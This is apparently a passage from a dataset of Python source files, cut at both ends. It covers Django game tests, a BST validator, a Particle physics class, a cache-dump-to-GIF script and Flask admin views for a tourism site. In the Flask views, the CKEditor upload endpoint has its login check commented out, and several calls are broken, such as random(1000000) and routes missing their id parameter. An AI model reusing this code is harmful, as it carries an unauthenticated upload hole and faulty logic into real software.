= game_delete(request, self.game.id)\n self.assertEqual(response.status_code, 200)\n\n def test_post_delete(self):\n game_id = self.game.id\n request = self.factory.post('/games/delete/')\n request.user = self.user\n response = game_delete(request, game_id)\n self.assertEqual(response.status_code, 302)\n game = Game.objects.filter(pk=game_id).first()\n self.assertIsNone(game)\n\n def test_get_next_status(self):\n request = self.factory.get('/games/nextStatus/', follow=True)\n request.user = self.user\n response = game_next_status(request, self.game.id)\n self.assertEqual(response.status_code, 302)\n self.game.refresh_from_db()\n self.assertEqual(Game.REGISTRATION, self.game.status)\n\n def test_get_prev_status(self):\n self.game.next_status()\n request = self.factory.get('/games/prevStatus/', follow=True)\n request.user = self.user\n response = game_previous_status(request, self.game.id)\n self.assertEqual(response.status_code, 302)\n self.game.refresh_from_db()\n self.assertEqual(Game.DRAFT, self.game.status)\n","sub_path":"backend/api/app/tests/integration/games/TestGames.py","file_name":"TestGames.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"446045016","text":"from MinimalTree import MinimalTree\n\ndef ValidateBST(root):\n value = root.value\n leftTree = root.left_child\n rightTree = root.right_child\n if leftTree != None and leftTree.max() >= value:\n return False\n if rightTree != None and rightTree.min() <= value:\n return False\n if (leftTree == None or ValidateBST(leftTree)) and (rightTree == None or ValidateBST(rightTree)):\n return True\n else:\n return False\n\ntree = MinimalTree([1,2,3,4,5,6,7],7)\nprint(tree)\nprint(ValidateBST(tree))\ntree = MinimalTree([1,3,2,4,5,6,7],7)\nprint(tree)\nprint(ValidateBST(tree))","sub_path":"Chapter-4/Exercise-4.5/ValidateBST.py","file_name":"ValidateBST.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"365976325","text":"\r\nimport math\r\nfrom position_object import Cartesian, Spherical, sumC\r\nfrom Mathematics import matrices\r\nfrom decimal import Decimal, getcontext\r\ngetcontext().prec = 40\r\nG = Decimal(Decimal(6.67408)*Decimal(10)**Decimal(-11))\r\n\r\n \r\nclass Particle:\r\n\r\n # initialization\r\n def __init__(self, mass=0, charge=0, speed=0, phi=Decimal(0),\r\n theta=Decimal(math.pi)/Decimal(2), position=Cartesian(),\r\n name='Particle', colour='black', hist=[], time=0):\r\n '''\r\n Give:\r\n mass in kilograms (kg)\r\n charge in coulombs (C)\r\n speed in metres per second (m/s)\r\n angles in radians (rad)\r\n position in metres (m)\r\n time in seconds (s)\r\n Note:\r\n phi represents the counter-clockwise angle from the x-axis\r\n theta represents the angle below the positive z-axis\r\n These angles represent the direction of velocity\r\n '''\r\n \r\n #eliminating inappropriate types\r\n if type(mass)==bool or type(charge)==bool or type(speed)==bool \\\r\n or type(phi)==bool or type(theta)==bool or type(time)==bool:\r\n raise TypeError('properties must have real number values')\r\n if type(name) != str:\r\n raise TypeError('name must be a string')\r\n if type(colour) != str:\r\n raise TypeError('colour must be a string')\r\n if type(hist) != list and type(hist) != tuple:\r\n raise TypeError('history must contain ordered iterable')\r\n elif len(hist) >= 1:\r\n for i in range(len(hist)):\r\n if len(hist[i]) != 9:\r\n if 
i==len(hist)-1:\r\n if len(hist[i])==1 and type(hist[i][0])==Particle:\r\n pass\r\n elif len(hist[i])==2 and type(hist[i][0])==Particle \\\r\n and type(hist[i][1])==Particle:\r\n pass\r\n else:\r\n raise ValueError('origin of Particle can have no more\\\r\nthan two references')\r\n else:\r\n raise ValueError('history records must contain 9 items')\r\n \r\n\r\n #obtaining position\r\n if type(position)==Cartesian:\r\n self.s = position\r\n elif type(position) == tuple or type(position) == list or \\\r\n type(position) == Spherical:\r\n self.s = Cartesian(position)\r\n else:\r\n raise TypeError('position must be given as Cartesian, Spherical, \\\r\n tuple, or list')\r\n\r\n #eliminating non-real values\r\n try:\r\n mass = Decimal(mass)\r\n charge = Decimal(charge)\r\n speed = Decimal(speed)\r\n phi = Decimal(phi)\r\n theta = Decimal(theta)\r\n time = Decimal(time)\r\n except (ValueError, TypeError):\r\n raise TypeError ('input must be a real number value')\r\n\r\n #eliminating inappropriate values\r\n if mass < 0:\r\n raise ValueError ('mass cannot be negative')\r\n if speed < 0:\r\n tmp = Spherical(speed, theta, phi)\r\n speed = tmp.rad\r\n theta = tmp.theta\r\n phi = tmp.phi\r\n\r\n #initializing instances\r\n self.m = mass\r\n self.q = charge\r\n self.v = speed\r\n self.phi = phi\r\n self.theta = theta\r\n self.name = name\r\n self.col = colour\r\n self.hist = hist\r\n self.t = time\r\n return\r\n\r\n # comparison\r\n def __eq__(self, other):\r\n '''\r\n Returns True if equality holds for mass, charge, velocity, and time'''\r\n return self.m == other.m and self.q == other.q and self.v == other.v \\\r\n and self.phi == other.phi and self.theta == other.theta and \\\r\n self.t == other.t\r\n def __ne__(self, other):\r\n '''\r\n Returns False if equality holds for mass, charge, velocity, and time'''\r\n return not(self==other)\r\n def __ge__(self, other):\r\n ''' Not supported '''\r\n raise TypeError ('unorderable types: Particle() >= Particle()')\r\n def __gt__(self, other):\r\n ''' Not supported '''\r\n raise TypeError ('unorderable types: Particle() > Particle()')\r\n def __le__(self, other):\r\n ''' Not supported '''\r\n raise TypeError ('unorderable types: Particle() <= Particle()')\r\n def __lt__(self, other):\r\n ''' Not supported '''\r\n raise TypeError ('unorderable types: Particle() < Particle()')\r\n\r\n # representation\r\n def __repr__(self):\r\n '''Returns repr(self)'''\r\n return 'Particle('+str(self.m)+', '+str(self.q)+', '+str(self.v)+\\\r\n ', '+str(self.phi)+', '+str(self.theta)+', '+repr(self.s)+\\\r\n ', '+self.name+', '+self.col+', '+str(self.hist)+', '\\\r\n +str(self.t)+')'\r\n def __str__(self):\r\n '''Return str(self)'''\r\n tmp = self.name+': \\n ' + \\\r\n '\\t mass = ' + str(round(self.m, 4)) + ' kg \\n ' + \\\r\n '\\t charge = ' + str(round(self.q, 4)) + ' C \\n ' + \\\r\n '\\t velocity = ' + str(round(self.v, 4)) + ' m/s [' + \\\r\n str(round(90-math.degrees(self.theta), 4)) + \\\r\n '\\u00B0 UP, ' + str(round(math.degrees(self.phi), 4)) + '\\u00B0 RIGHT] \\n' + \\\r\n '\\t position = ' + str(round(self.s, 4)) + ' m'\r\n return tmp\r\n\r\n # copying\r\n def alias(self):\r\n '''\r\n (Particle) -> Particle\r\n '''\r\n return self\r\n def clone(self):\r\n '''\r\n (Particle) -> Particle\r\n '''\r\n return Particle(self.m, self.q, self.v, self.phi, self.theta, self.s, \\\r\n self.name, self.col, matrices.clone(self.hist), self.t)\r\n\r\n # arithmetic\r\n def __mul__(self, value):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support 
multiplication')\r\n def __rmul__(self, value):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support multiplication')\r\n def __truediv__(self, value):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support division')\r\n def __floordiv__(self, value):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support division')\r\n def __mod__(self, value):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support division')\r\n def __pos__(self):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support a sign convention')\r\n def __neg__(self):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support a sign convention')\r\n def __abs__(self):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support a magnitude')\r\n def __add__(self, other, name='Particle', colour='black'):\r\n '''\r\n Combines two particles into one\r\n (Particle, Particle, str, str) -> Particle\r\n Note: this is equivalent to a completely inelastic collision of the two\r\n Particles\r\n '''\r\n if self.s != other.s or self.t != other.t:\r\n raise ValueError('Particles must occupy the same position \\\r\nat the same time to collide')\r\n vs = Spherical(self.v, self.theta, self.phi)\r\n vo = Spherical(other.v, other.theta, other.phi)\r\n vn = (self.m*vs + other.m*vo)/(self.m + other.m)\r\n new=Particle(self.m+other.m, self.q+other.q, vn.rad, vn.phi, vn.theta, \\\r\n self.s, name, colour, [[self, other]], self.t)\r\n return new\r\n def __sub__(self, other, name='Particle', colour='black'):\r\n '''\r\n Facilitates explosion of self; explosion fragment other is given,\r\n second fragment is returned\r\n (Particle, Particle, str, str) -> Particle\r\n '''\r\n if self.s != other.s or self.t != other.t:\r\n raise ValueError('Particles must occupy the same position \\\r\nat the same time to explode')\r\n if other.hist == []:\r\n other.hist = [[self]]\r\n elif other.hist == [[self]]:\r\n pass\r\n else:\r\n raise ValueError('given explosion fragment must not have history')\r\n vs = Spherical(self.v, self.theta, self.phi)\r\n vo = Spherical(other.v, other.theta, other.phi)\r\n vn = (self.m*vs - other.m*vo)/(self.m - other.m)\r\n new=Particle(self.m-other.m, self.q-other.q, vn.rad, vn.phi, vn.theta, \\\r\n self.s, name, colour, [[self]], self.t)\r\n return new\r\n def __round__(self, digits=12):\r\n '''\r\n Rounds all numeric parameters to digits decimal places\r\n (Particle) -> None\r\n '''\r\n self.m = round(self.m, digits)\r\n self.q = round(self.q, digits)\r\n self.v = round(self.v, digits)\r\n self.phi = round(self.phi, digits)\r\n self.theta = round(self.theta, digits)\r\n self.s = round(self.s, digits)\r\n return\r\n\r\n # actions\r\n def d_mass(self, dm):\r\n '''\r\n Changes mass of Particle self by dm\r\n (Particle, num) -> None\r\n '''\r\n if self.m + dm <= 0:\r\n raise ValueError('mass cannot have negative value')\r\n self.m = self.m + dm\r\n return\r\n def d_charge(self, dq):\r\n '''\r\n Changes charge of Particle self by dq\r\n (Particle, num) -> None\r\n '''\r\n self.q = self.q + dq\r\n return\r\n def d_velocity(self, dv):\r\n '''\r\n (Particle, Spherical) -> None\r\n '''\r\n vn = Spherical(self.v, self.theta, self.phi) + dv\r\n self.v = vn.rad\r\n self.theta = vn.theta\r\n self.phi = vn.phi\r\n return\r\n def displace(self, ds):\r\n '''\r\n Moves Particle self by differentials dx, dy, dz\r\n (Particle, Cartesian) -> None\r\n '''\r\n self.s = self.s + ds\r\n return\r\n def d_time(self, dt):\r\n '''\r\n 
Increments time by dt\r\n (Particle, num) -> None\r\n '''\r\n if dt <= 0:\r\n raise ValueError('time cannot go backwards')\r\n self.t = self.t + dt\r\n return\r\n def rec_state(self):\r\n '''\r\n Records current state in history\r\n (Particle) -> None\r\n '''\r\n self.hist.append([self.t, self.m, self.q, self.v, self.phi, self.theta, \\\r\n self.s, self.name, self.col])\r\n return\r\n\r\n # properties\r\n def distance(self, other=Cartesian()):\r\n '''\r\n Returns distance between Particles self and other; if other is not given,\r\n returns distance to origin\r\n (Particle, Particle) -> num\r\n (Particle, Cartesian) -> num\r\n '''\r\n if type(other) == Cartesian:\r\n return (self.s - other).radius()\r\n elif type(other) == Particle:\r\n return (self.s - other.s).radius()\r\n else:\r\n raise TypeError('second argument, if given, must be Particle or \\\r\nCartesian')\r\n return\r\n\r\n # forces\r\n def grav_f(self, other):\r\n '''\r\n Returns gravitational force vector on self as a result of other\r\n (Particle, Particle) -> Cartesian\r\n '''\r\n if type(other) != Particle:\r\n raise TypeError('other must be an object of type Particle')\r\n r = other.s - self.s\r\n F = (G * self.m * other.m / (r.radius())**2) * r.unit()\r\n return F\r\n def elec_f(self, other):\r\n raise Exception('electric force computations not available')\r\n def accel(self, Fs):\r\n '''\r\n Returns instantaneous acceleration vector of self as a result of forces\r\n in list Fs\r\n (Particle, list) -> Cartesian\r\n Preconditions: list Fs must contain Cartesians (force vectors)\r\n '''\r\n Fnet = sumC(Fs)\r\n a = Fnet / self.m\r\n return a\r\n\r\n\r\n\r\n \r\n \r\n","sub_path":"System Object/body_object.py","file_name":"body_object.py","file_ext":"py","file_size_in_byte":11867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"228107957","text":"from collections import defaultdict, Counter\nimport csv\nimport matplotlib.pyplot as plt\nimport os\nfrom shutil import rmtree\nimport sys\nfrom tqdm import tqdm\n\niterations = int(sys.argv[1])\nSCRATCHSPACE_DIR = \"/tmp/dumpcache/\"\nXKCD_STYLE_PLOTS = False # I thought this was fun\n\nprint(\"Processing CSV files into GIF\")\nfor filename_index in tqdm(range(iterations)):\n with open(SCRATCHSPACE_DIR + '/cachedump{}.csv'.format(filename_index)) as csvfile:\n fieldnames = ['cache_set_idx', 'cache_line_idx', 'pid', 'data[0]', 'data[1]', 'data[2]', 'data[3]', 'data[4]', 'data[5]',\n 'data[6]', 'data[7]', 'data[8]', 'data[9]', 'data[10]', 'data[11]', 'data[12]', 'data[13]', 'data[14]', 'data[15]']\n columns = defaultdict(list)\n extracted_fieldnames = ['pid']\n reader = csv.DictReader(csvfile, fieldnames=fieldnames) # read rows into a dictionary format\n for row in reader: # read a row as {column1: value1, column2: value2,...}\n for (k,v) in row.items(): # go over each column name and value \n if k in extracted_fieldnames: # only concerned with the fieldnames in extracted_fieldnames\n columns[k].append(v) \n\n pid_list = columns['pid']\n c = Counter(pid_list)\n c = sorted(c.items())\n pid_counts = [i[0] for i in c]\n pids = [i[0] for i in c]\n freq = [i[1] for i in c]\n\n if XKCD_STYLE_PLOTS:\n plt.xkcd()\n \n f, ax = plt.subplots()\n\n bar_lst = plt.bar(pids, freq)\n ax.annotate(\"Snapshot {}\".format(filename_index), textcoords='figure fraction', xy=(0.90, 0.97), xytext=(0.90, 0.97), va='top', ha='center', fontsize=10)\n plt.title(\"Cachelines per PID\")\n plt.xlabel(\"PID / Percentage of Cachelines\", labelpad=35)\n 
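# the large labelpad leaves room for the per-bar percentage annotations drawn below the x-axis further down\n    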
plt.ylabel(\"Number of Cachelines\")\n ax.set_xticklabels(pids, fontsize=8, rotation='vertical')\n\n for bar, pid in zip(bar_lst, pids):\n bar.set_color(\"#\" + \"{:x}\".format((int((pid.strip().strip(\"-\"))) * 100000) % 16777215).zfill(6))\n bar.set_edgecolor(\"black\")\n bar.set_linewidth(2)\n\n # Label the percentages below the x-axis...\n for x, count in enumerate(freq):\n # Label the percentages\n percent = '{:.1f}%'.format(100 * float(count) / sum(freq))\n ax.annotate(percent, xy=(x, 0), xycoords=('data', 'axes fraction'),\n xytext=(0, -35), textcoords='offset points', va='top', ha='center', fontsize=8, rotation='vertical')\n\n plt.tight_layout()\n plt.savefig(SCRATCHSPACE_DIR + 'graphic{}.png'.format(filename_index, bbox_inches='tight'))\n plt.close()\n\nimg_list = []\nfor filename in os.listdir(SCRATCHSPACE_DIR):\n if filename.endswith('.png'):\n img_list.append(SCRATCHSPACE_DIR + filename)\n\nimg_list.sort(key=lambda x: int(''.join(filter(str.isdigit, x))))\nos.system('convert -loop 0 -delay 75 %s graphic.gif' % ' '.join(img_list))\n\n# Clean up png and csv files\nrmtree(SCRATCHSPACE_DIR)\n","sub_path":"dump_cache_to_gif/generate_graphic.py","file_name":"generate_graphic.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"633994153","text":"from functools import wraps\nfrom sqlalchemy import or_, and_\nfrom . import admin\nfrom app.admin.forms import LoginForm, ScenicForm, AreaForm, TravelsForm\nfrom flask import render_template, redirect, url_for, session, request, flash, current_app, make_response\nfrom app.models import Admin, AdminLog, Area, Scenic, Oplog, Travels, User, Suggestion, UserLog\nfrom app import db\nfrom werkzeug.utils import secure_filename\nfrom random import random\nimport os\n\n\ndef admin_login(f):\n \"\"\"登录装饰器\n\n Args:\n\n Returns:\n\n Raise:\n\n \"\"\"\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if \"admin_id\" not in session:\n flash(\"请先登录\", \"error\")\n return redirect(url_for(\"admin.login\"))\n return f(*args, **kwargs)\n\n return decorated_function\n\n\n@admin.route(\"login\", methods=[\"POST\", \"GET\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n data = form.data\n account = data[\"account\"]\n password = data[\"password\"]\n admin = Admin.query.filter_by(account=account).first()\n if admin.check_password_hash(password):\n session[\"admin\"] = admin.account\n session[\"admin_id\"] = admin.id\n adminlog = AdminLog(admin_id=admin.id,\n ip=request.remote_addr)\n db.session.add(adminlog)\n db.session.commit()\n return redirect(url_for(\"admin.index\"))\n return render_template(\"admin/login.html\", form=form)\n\n\n@admin.route(\"/index\", methods=[\"GET\"])\n@admin_login\ndef index():\n return render_template(\"admin/index.html\", admin=session[\"admin\"])\n\n\n@admin.route(\"scenic/add\", methods=[\"POST\", \"GET\"])\n@admin_login\ndef scenic_add():\n \"\"\"添加景区页面\n\n Args:\n\n Returns:\n\n Raise:\n\n \"\"\"\n form = ScenicForm()\n form.area_id.choices = [(v.id, v.name) for v in Area.query.all()]\n if form.validate_on_submit():\n data = form.data\n scenic_count = Scenic.query.filter_by(title=data[\"title\"]).count()\n if scenic_count == 1:\n flash(\"景点已存在!\", \"err\")\n return redirect(url_for(\"admin.scenic_add\"))\n # 生成唯一的文件名称\n file_logo = secure_filename(form.logo.data.filename)\n\n if not os.path.exists(current_app.config[\"UP_DIR\"]):\n os.makedirs(current_app.config[\"UP_DIR\"])\n 
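# loosen permissions on the newly created upload directory; os.chmod requires a numeric mode\n            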
os.chmod(current_app.config["UP_DIR"], 0o755)\n        # logo = change_filename(file_logo)\n        logo = file_logo\n        form.logo.data.save(current_app.config["UP_DIR"] + logo)\n        scenic = Scenic(\n            title=data["title"],\n            logo=logo,\n            star=int(data["star"]),\n            address=data["address"],\n            is_hot=int(data["is_hot"]),\n            is_recommended=int(data["is_recommended"]),\n            introduction=data["introduction"],\n            content=data["content"],\n            area_id=data["area_id"]\n        )\n        db.session.add(scenic)\n        db.session.commit()\n        flash("添加成功!", "ok")\n        return redirect(url_for("admin.scenic_add"))\n    return render_template("admin/scenic_add.html", form=form)\n\n\n@admin.route("/scenic/list", methods=["POST", "GET"])\n@admin_login\ndef scenic_list():\n    title = request.args.get("title", "", type=str)\n    page = request.args.get("page", 1, type=int)\n    if title:\n        page_data = Scenic.query.filter_by(title=title).order_by(\n            Scenic.add_time.desc()\n        ).paginate(page=page, per_page=5)\n    else:\n        page_data = Scenic.query.order_by(\n            Scenic.add_time.desc()\n        ).paginate(page=page, per_page=5)\n    return render_template("admin/scenic_list.html", page_data=page_data)\n\n\n@admin.route("/scenic/edit/<int:id>", methods=["POST", "GET"])\n@admin_login\ndef scenic_edit(id=None):\n    form = ScenicForm()\n    form.area_id.choices = [(v.id, v.name) for v in Area.query.all()]\n    form.submit.label.text = "修改"\n    form.logo.validators = []\n    scenic = Scenic.query.get_or_404(int(id))\n    if request.method == "GET":\n        form.is_recommended.data = scenic.is_recommended\n        form.is_hot.data = scenic.is_hot\n        form.area_id.data = scenic.area_id\n        form.star.data = scenic.star\n        form.content.data = scenic.content\n        form.introduction.data = scenic.introduction\n        form.title.data = scenic.title\n        form.address.data = scenic.address\n    if form.validate_on_submit():\n        data = form.data\n        scenic_count = Scenic.query.filter_by(title=data["title"]).count()\n\n        if scenic_count == 1 and scenic.title != data["title"]:\n            flash("景点已存在!", "err")\n            return redirect(url_for("admin.scenic_edit", id=id))\n        if not os.path.exists(current_app.config["UP_DIR"]):\n            os.makedirs(current_app.config["UP_DIR"])\n            os.chmod(current_app.config["UP_DIR"], 0o755)  # numeric mode; the original "rw" string would raise TypeError\n        if form.logo.data != "":\n            file_logo = secure_filename(form.logo.data.filename)\n            scenic.logo = file_logo\n            form.logo.data.save(current_app.config["UP_DIR"] + scenic.logo)\n\n        scenic.title = data["title"]\n        scenic.address = data["address"]\n        scenic.area_id = data["area_id"]\n        scenic.star = int(data["star"])\n        scenic.is_hot = int(data["is_hot"])\n        scenic.is_recommended = int(data["is_recommended"])\n        scenic.introduction = data["introduction"]\n        scenic.content = data["content"]\n\n        db.session.add(scenic)\n        db.session.commit()\n        flash("修改景区成功!", "ok")\n        addOplog("修改景区" + scenic.title)\n        return redirect(url_for("admin.scenic_edit", id=id))\n    return render_template("admin/scenic_edit.html", form=form, scenic=scenic)\n\n\n@admin.route("/scenic/del/<int:id>", methods=["GET"])\n@admin_login\ndef scenic_del(id=None):\n    scenic = Scenic.query.get_or_404(id)\n    db.session.delete(scenic)\n    db.session.commit()\n    flash("景区删除成功", "ok")\n    addOplog("删除景区" + scenic.title)\n    return redirect(url_for("admin.scenic_list", page=1))\n\n\n@admin.route("/ckupload", methods=["POST", "OPTIONS"])\n# @admin.login\ndef ckupload():\n    error = ""\n    url = ""\n    callback = request.args.get("CKEditorFuncNum")\n\n    if request.method == "POST" and "upload" in request.files:\n        fileobj = 
request.files["upload"]\n        fname, fext = os.path.splitext(fileobj.filename)\n        rnd_name = "{}{}".format(int(random() * 1000000), fext)  # random() takes no arguments; scale it to build a pseudo-random name\n\n        filepath = os.path.join(current_app.static_folder, "uploads/ckeditor", rnd_name)\n        print(filepath)\n        dirname = os.path.dirname(filepath)\n        if not os.path.exists(dirname):\n            try:\n                os.makedirs(dirname)\n            except:\n                error = "ERROR_CREATE_DIR"\n        elif not os.access(dirname, os.W_OK):\n            error = "ERROR_DIR_NOT_WRITEABLE"\n\n        if not error:\n            fileobj.save(filepath)\n            url = url_for("static", filename="{}/{}".format("uploads/ckeditor", rnd_name))\n    else:\n        error = "post error"\n\n    # standard CKEditor upload callback snippet; the markup between the triple quotes had been stripped from this source\n    res = """<script>window.parent.CKEDITOR.tools.callFunction({0}, '{1}', '{2}');</script>""".format(callback, url, error)\n\n    response = make_response(res)\n    response.headers["Content-Type"] = "text/html"\n    return response\n\n\n@admin.route("/area/add", methods=["GET", "POST"])\n@admin_login\ndef area_add():\n    form = AreaForm()\n    if form.validate_on_submit():\n        data = form.data\n        area = Area.query.filter_by(name=data["name"]).count()\n        if area == 1:\n            flash("地区已存在", "error")\n            return redirect(url_for("admin.area_add"))\n        area = Area(\n            name=data["name"],\n            is_recommended=data["is_recommended"],\n            introduction=data["introduction"]\n        )\n        db.session.add(area)\n        db.session.commit()\n        addOplog("添加地区" + data["name"])\n        flash("地区添加成功", "ok")\n        return redirect(url_for("admin.area_add"))\n    return render_template("admin/area_add.html", form=form)\n\n\n@admin.route("/area/del/<int:id>", methods=["GET"])\n@admin_login\ndef area_del(id=None):\n    area = Area.query.filter_by(id=id).first_or_404()\n    db.session.delete(area)\n    db.session.commit()\n    addOplog("删除地区" + area.name)\n    flash("地区<<{0}>>删除成功".format(area.name), "ok")\n    return redirect(url_for("admin.area_list"))\n\n\n@admin.route("/area/list", methods=["GET"])\n@admin_login\ndef area_list():\n    name = request.args.get("name", type=str)\n    page = request.args.get("page", 1, type=int)\n    if name:\n        page_data = Area.query.filter_by(name=name).order_by(\n            Area.add_time.desc()\n        ).paginate(page=page, per_page=5)\n    else:\n        page_data = Area.query.order_by(\n            Area.add_time.desc()\n        ).paginate(page=page, per_page=5)\n    return render_template("admin/area_list.html", page_data=page_data)\n\n\n@admin.route("/area/edit/<int:id>", methods=["POST", "GET"])\n@admin_login\ndef area_edit(id=None):\n    form = AreaForm()\n    form.submit.label.text = "修改"\n    area = Area.query.get_or_404(int(id))\n    if request.method == "GET":\n        form.name.data = area.name\n        form.is_recommended.data = area.is_recommended\n        form.introduction.data = area.introduction\n    if form.validate_on_submit():\n        data = form.data\n        area_count = Area.query.filter_by(name=data["name"]).count()\n        if area_count == 1 and area.name != data["name"]:\n            flash("地区已存在!", "error")\n            return redirect(url_for("admin.area_edit", id=id))\n        area.name = data["name"]\n        area.is_recommended = data["is_recommended"]\n        area.introduction = data["introduction"]\n        db.session.add(area)\n        db.session.commit()\n        flash("修改地区成功!", "ok")\n        addOplog("修改地区" + str(area.name))\n        return redirect(url_for("admin.area_edit", id=id))\n    return render_template("admin/area_edit.html", form=form, area=area)\n\n\n@admin.route("/travels/add", methods=["POST", "GET"])\n@admin_login\ndef travels_add():\n    form = TravelsForm()\n    form.scenic_id.choices = [(v.id, v.title) for v in Scenic.query.all()]\n    if form.validate_on_submit():\n        data = form.data\n        travels_count = Travels.query.filter_by(title=data["title"]).count()\n        if travels_count == 1:\n            
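# duplicate travelogue title: warn and redirect back to the add form\n            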
flash(\"景点已存在!\", \"err\")\n return redirect(url_for(\"admin.travels_add\"))\n travels = Travels(\n title=data[\"title\"],\n author=data[\"author\"],\n scenic_id=data[\"scenic_id\"],\n content=data[\"content\"],\n )\n db.session.add(travels)\n db.session.commit()\n addOplog(\"添加游记\" + data[\"title\"])\n flash(\"添加游记成功\", \"ok\")\n return redirect(url_for(\"admin.travels_add\"))\n return render_template(\"admin/travels_add.html\", form=form)\n\n\n@admin.route(\"/travels/list\", methods=[\"GET\"])\n@admin_login\ndef travels_list():\n keywords = request.args.get(\"keywords\", \"\", type=str)\n page = request.args.get(\"page\", 1, type=int)\n if keywords:\n page_data = Travels.query.filter(Travels.title.like(\"%\"+keywords+\"%\")).order_by(\n Travels.add_time.desc()\n ).paginate(page=page, per_page=5)\n else:\n page_data = Travels.query.order_by(\n Travels.add_time.desc()\n ).paginate(page=page, per_page=5)\n return render_template(\"admin/travels_list.html\", page_data=page_data)\n\n\n@admin.route(\"/travels/edit/\", methods=[\"POST\", \"GET\"])\n@admin_login\ndef travels_edit(id=None):\n form = TravelsForm()\n form.scenic_id.choices = [(v.id, v.title) for v in Scenic.query.all()]\n form.submit.label.text = \"修改\"\n travels = Travels.query.get_or_404(int(id))\n if request.method == \"GET\":\n form.content.data = travels.content\n form.author.data = travels.author\n form.title.data = travels.title\n if form.validate_on_submit():\n data = form.data\n travels_count = Travels.query.filter_by(title=data[\"title\"]).count()\n if travels_count == 1 and travels.title != data[\"title\"]:\n flash(\"游记已存在!\", \"error\")\n return redirect(url_for(\"admin.travels_edit\", id=id))\n travels.title = data[\"title\"]\n travels.content = data[\"content\"]\n travels.author = data[\"author\"]\n db.session.add(travels)\n db.session.commit()\n flash(\"修改景区成功!\", \"ok\")\n addOplog(\"修改景区\" + travels.title)\n return redirect(url_for(\"admin.travels_edit\", id=id))\n return render_template(\"admin/travels_edit.html\", form=form, travels=travels)\n\n\n@admin.route(\"/travels/del\", methods=[\"GET\"])\n@admin_login\ndef travels_del(id=None):\n travels = Travels.query.filter_by(id=id).first_or_404()\n db.session.delete(travels)\n db.session.commit()\n addOplog(\"删除地区\" + travels.name)\n flash(\"地区<<{0}>>删除成功\".format(travels.name), \"ok\")\n return redirect(url_for(\"admin.travels_list\"))\n\n\n@admin.route(\"/user/list\", methods=[\"GET\"])\n@admin_login\ndef user_list():\n page = request.args.get(\"page\", 1, type=int)\n keyword = request.args.get(\"keyword\", \"\", type=str)\n\n if keyword:\n filters = or_(User.username == keyword, User.email == keyword)\n page_data = User.query.filter(filters).order_by(\n User.add_time.desc()\n ).paginate(page=page, per_page=5)\n else:\n page_data = User.query.order_by(\n User.add_time.desc()\n ).paginate(page=page, per_page=5)\n\n return render_template(\"admin/user_list.html\", page_data=page_data)\n\n\n@admin.route(\"/user/view/\", methods=[\"GET\"])\n@admin_login\ndef user_view(id=None):\n form_page = request.args.get(\"fp\")\n if not form_page:\n form_page = 1\n filters = and_(UserLog.user_id == User.id, User.id == id)\n user = User.query.join(UserLog).filter(filters)\n print(user)\n return render_template(\"admin/user_view.html\", user=user, form_page=form_page)\n\n\n@admin.route(\"/user/del\", methods=[\"GET\"])\n@admin_login\ndef user_del(id=None):\n user = User.query.filter_by(id=id).first_or_404()\n db.session.delete(user)\n db.session.commit()\n addOplog(\"删除地区\" + 
user.name)\n flash(\"地区<<{0}>>删除成功\".format(user.email), \"ok\")\n return redirect(url_for(\"admin.user_list\"))\n\n\n@admin.route(\"/suggestion_list/list\", methods=[\"GET\"])\n@admin_login\ndef suggestion_list():\n page = request.args.get(\"page\", 1, type=int)\n page_data = Suggestion.query.order_by(\n Suggestion.add_time.desc()\n ).paginate(page=page, per_page=5)\n return render_template(\"admin/suggestion.html\", page_data=page_data)\n\n\n@admin.route(\"/suggestion/del/\", methods=[\"GET\"])\n@admin_login\ndef suggestion_del(id=None):\n page = request.args.get(\"page\", 1, type=int)\n suggestion = Suggestion.query.get_or_404(int(id))\n db.session.delete(suggestion)\n db.session.commit()\n addOplog(\"删除意见建议\")\n flash(\"删除成功!\", \"ok\")\n return redirect(url_for(\"admin.suggestion_list\", page=page))\n\n\n@admin.route(\"/oplog/list\", methods=[\"GET\"])\n@admin_login\ndef oplog_list():\n page = request.args.get(\"page\", 1, type=int)\n page_data = Oplog.query.join(\n Admin\n ).filter(\n Admin.id == Oplog.admin_id,\n ).order_by(\n Oplog.add_time.desc()\n ).paginate(page=page, per_page=10)\n return render_template(\"admin/oplog_list.html\", page_data=page_data)\n\n\n@admin.route(\"/adminloginlog/list\", methods=[\"GET\"])\n@admin_login\ndef adminloginlog_list(page=None):\n page = request.args.get(\"page\", 1, type=int)\n page_data = AdminLog.query.join(\n Admin\n ).filter(\n Admin.id == AdminLog.admin_id,\n ).order_by(\n AdminLog.add_time.desc()\n ).paginate(page=page, per_page=10)\n return render_template(\"admin/adminloginlog_list.html\", page_data=page_data)\n\n\n@admin.route(\"userloginlog/list\", methods=[\"GET\"])\n@admin_login\ndef userloginlog_list(page=None):\n page = request.args.get(\"page\", 1, type=int)\n page_data = UserLog.query.join(\n User\n ).filter(\n User.id == UserLog.id\n ).order_by(\n UserLog.add_time.desc()\n ).paginate(page=page, per_page=10)\n return render_template(\"auth/userloginlog_list.html\", page_data=page_data)\n\n\ndef addOplog(reason):\n oplog = Oplog(\n admin_id=session[\"admin_id\"],\n ip=request.remote_addr,\n reason=reason\n )\n db.session.add(oplog)\n db.session.commit()\n#\n# def gen_rnd_filename():\n# return datetime.now().strftime(\"%Y%m%d%H%M%S\") + str(uuid.uuid4().hex)\n\n\n","sub_path":"Graduation2/app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"530852657","text":"# The MIT License 